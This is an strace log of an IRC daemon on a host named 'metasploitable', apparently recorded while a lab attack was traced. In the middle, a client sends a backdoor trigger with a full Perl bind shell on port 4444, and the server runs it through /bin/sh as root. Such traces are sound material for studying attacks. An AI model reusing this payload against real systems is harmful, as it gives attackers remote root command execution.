4519  07:30:53.193255 select(1024, [2 3 4 7 9], [], NULL, {0, 760000}) = 1 (in [7], left {0, 710000})

4519  07:30:53.242415 clock_gettime(CLOCK_MONOTONIC, {2263, 59424533}) = 0

4519  07:30:53.242416 recv(7, "PRIVMSG  #testit2 ABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 45

4519  07:30:53.242416 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.242416 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.242416 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.242417 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.242424 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.242439 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.242453 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.242467 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.242480 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.242494 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.242507 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.242521 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.242535 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.242548 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.242562 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.242575 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.242604 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.242643 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.242657 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.242686 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.242699 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.242713 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.242730 gettimeofday({1495625453, 242734}, NULL) = 0

4519  07:30:53.242742 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {0, 880000})

4519  07:30:53.367996 clock_gettime(CLOCK_MONOTONIC, {2263, 185016748}) = 0

4519  07:30:53.368016 time(NULL)        = 1495625453

4519  07:30:53.368026 time(NULL)        = 1495625453

4519  07:30:53.368043 gettimeofday({1495625453, 368048}, NULL) = 0

4519  07:30:53.368056 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})

4519  07:30:53.368095 clock_gettime(CLOCK_MONOTONIC, {2263, 185107615}) = 0

4519  07:30:53.368105 gettimeofday({1495625453, 368108}, NULL) = 0

4519  07:30:53.368115 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})

4519  07:30:53.368152 clock_gettime(CLOCK_MONOTONIC, {2263, 185165368}) = 0

4519  07:30:53.368164 accept(2, 0, NULL) = 5

4519  07:30:53.368183 getpeername(5, {sa_family=AF_INET, sin_port=htons(46235), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:30:53.368214 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:30:53.368229 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:30:53.368242 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:30:53.368255 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:30:53.368266 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:30:53.368276 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:30:53.368288 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:30:53.368304 clock_gettime(CLOCK_MONOTONIC, {2263, 185317504}) = 0

4519  07:30:53.368316 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:30:53.368327 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:30:53.368529 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:30:53.368555 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:30:53.368566 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:30:53.368584 send(6, "\355\365\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:30:53.368661 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:30:53.368716 gettimeofday({1495625453, 368720}, NULL) = 0

4519  07:30:53.368727 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {0, 990000})

4519  07:30:53.373547 clock_gettime(CLOCK_MONOTONIC, {2263, 190564469}) = 0

4519  07:30:53.373564 recvfrom(6, "\355\365\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0t\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:30:53.373671 close(6)          = 0

4519  07:30:53.373701 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:30:53.373715 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:30:53.373785 time(NULL)        = 1495625453

4519  07:30:53.373797 time(NULL)        = 1495625453

4519  07:30:53.373808 gettimeofday({1495625453, 373812}, NULL) = 0

4519  07:30:53.373839 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:30:53.373881 clock_gettime(CLOCK_MONOTONIC, {2263, 190894192}) = 0

4519  07:30:53.373892 gettimeofday({1495625453, 373895}, NULL) = 0

4519  07:30:53.373902 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [7], left {0, 740000})

4519  07:30:53.633255 clock_gettime(CLOCK_MONOTONIC, {2263, 450275287}) = 0

4519  07:30:53.633276 recv(7, "PRIVMSG  #testit2 ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 71

4519  07:30:53.633301 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.633319 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.633333 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.633347 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.633361 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.633375 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.633388 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.633402 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.633415 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.633428 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.633441 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.633454 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.633468 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.633481 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.633494 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.633507 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.633520 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.633533 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.633546 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.633560 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.633580 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.633594 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:53.633622 gettimeofday({1495625453, 633627}, NULL) = 0

4519  07:30:53.633636 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:30:53.633737 clock_gettime(CLOCK_MONOTONIC, {2263, 450750129}) = 0

4519  07:30:53.633749 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:30:53.633776 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:30:53.633797 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:30:53.633809 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:30:53.633824 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 10002

10002 07:30:53.633892 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

10002 07:30:53.633906 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

10002 07:30:53.633917 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10002 07:30:53.633931 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

10002 07:30:53.634035 brk(0)            = 0x80f9000

10002 07:30:53.634057 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10002 07:30:53.634074 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f05000

10002 07:30:53.634091 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10002 07:30:53.634121 open("/etc/ld.so.cache", O_RDONLY) = 1

10002 07:30:53.634157 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10002 07:30:53.634176 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7efd000

10002 07:30:53.634201 close(1)          = 0

10002 07:30:53.634211 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10002 07:30:53.634227 open("/lib/libncurses.so.5", O_RDONLY) = 1

10002 07:30:53.634240 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

10002 07:30:53.634332 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

10002 07:30:53.634349 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ecd000

10002 07:30:53.634361 mmap2(0xb7efa000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7efa000

10002 07:30:53.634378 close(1)          = 0

10002 07:30:53.634390 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10002 07:30:53.634403 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10002 07:30:53.634417 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10002 07:30:53.634509 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10002 07:30:53.634526 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ec9000

10002 07:30:53.634537 mmap2(0xb7ecb000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7ecb000

10002 07:30:53.634553 close(1)          = 0

10002 07:30:53.634564 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10002 07:30:53.634577 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10002 07:30:53.634591 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10002 07:30:53.634731 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10002 07:30:53.634748 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ec8000

10002 07:30:53.634763 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d79000

10002 07:30:53.634774 mmap2(0xb7ec2000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ec2000

10002 07:30:53.634788 mmap2(0xb7ec5000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ec5000

10002 07:30:53.634802 close(1)          = 0

10002 07:30:53.634824 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d78000

10002 07:30:53.634836 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d786b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10002 07:30:53.634891 mprotect(0xb7ec2000, 4096, PROT_READ) = 0

10002 07:30:53.634928 munmap(0xb7efd000, 29913) = 0

10002 07:30:53.634954 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10002 07:30:53.634968 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

10002 07:30:53.634987 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf8e22a0) = -1 ENOTTY (Inappropriate ioctl for device)

10002 07:30:53.635021 brk(0)            = 0x80f9000

10002 07:30:53.635030 brk(0x80fa000)    = 0x80fa000

10002 07:30:53.635042 brk(0x80fb000)    = 0x80fb000

10002 07:30:53.635057 getuid32()        = 0

10002 07:30:53.635067 getgid32()        = 0

10002 07:30:53.635075 geteuid32()       = 0

10002 07:30:53.635084 getegid32()       = 0

10002 07:30:53.635097 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10002 07:30:53.635124 time(NULL)        = 1495625453

10002 07:30:53.635164 brk(0x80fc000)    = 0x80fc000

10002 07:30:53.635179 brk(0x80fd000)    = 0x80fd000

10002 07:30:53.635229 open("/proc/meminfo", O_RDONLY) = 1

10002 07:30:53.635252 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

10002 07:30:53.635270 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f04000

10002 07:30:53.635281 read(1, "MemTotal:      1035240 kB\nMemFree:        436728 kB\nBuffers:         75048 kB\nCached:         364412 kB\nSwapCached:          0 kB\nActive:         256108 kB\nInactive:       312288 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        436488 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4172 kB\nWriteback:           0 kB\nAnonPages:      128988 kB\nMapped:          52008 kB\nSlab:            18804 kB\nSReclaimable:    10296 kB\nSUnreclaim:       8508 kB\nPageTables:       1972 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

10002 07:30:53.635364 close(1)          = 0

10002 07:30:53.635375 munmap(0xb7f04000, 4096) = 0

10002 07:30:53.635387 brk(0x80fe000)    = 0x80fe000

10002 07:30:53.635413 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10002 07:30:53.635426 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10002 07:30:53.635438 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10002 07:30:53.635449 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10002 07:30:53.635461 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

10002 07:30:53.635472 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

10002 07:30:53.635485 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10002 07:30:53.635497 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10002 07:30:53.635509 uname({sys="Linux", node="metasploitable", ...}) = 0

10002 07:30:53.635557 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

10002 07:30:53.635575 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10002 07:30:53.635594 brk(0x8100000)    = 0x8100000

10002 07:30:53.635690 getcwd("/etc/unreal", 4096) = 12

10002 07:30:53.635732 getpid()          = 10002

10002 07:30:53.635749 getppid()         = 4519

10002 07:30:53.635778 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10002 07:30:53.635798 stat64("/sbin/sh", 0xbf8e2278) = -1 ENOENT (No such file or directory)

10002 07:30:53.635810 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10002 07:30:53.635827 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10002 07:30:53.635851 socket(PF_FILE, SOCK_STREAM, 0) = 1

10002 07:30:53.635864 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10002 07:30:53.635875 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10002 07:30:53.635897 close(1)          = 0

10002 07:30:53.635908 socket(PF_FILE, SOCK_STREAM, 0) = 1

10002 07:30:53.635918 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10002 07:30:53.635927 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10002 07:30:53.635945 close(1)          = 0

10002 07:30:53.635959 open("/etc/nsswitch.conf", O_RDONLY) = 1

10002 07:30:53.635973 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

10002 07:30:53.635990 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f04000

10002 07:30:53.636004 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

10002 07:30:53.636052 read(1, "", 4096) = 0

10002 07:30:53.636062 close(1)          = 0

10002 07:30:53.636071 munmap(0xb7f04000, 4096) = 0

10002 07:30:53.636087 open("/etc/ld.so.cache", O_RDONLY) = 1

10002 07:30:53.636099 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10002 07:30:53.636115 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7efd000

10002 07:30:53.636125 close(1)          = 0

10002 07:30:53.636135 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10002 07:30:53.636150 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

10002 07:30:53.636164 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 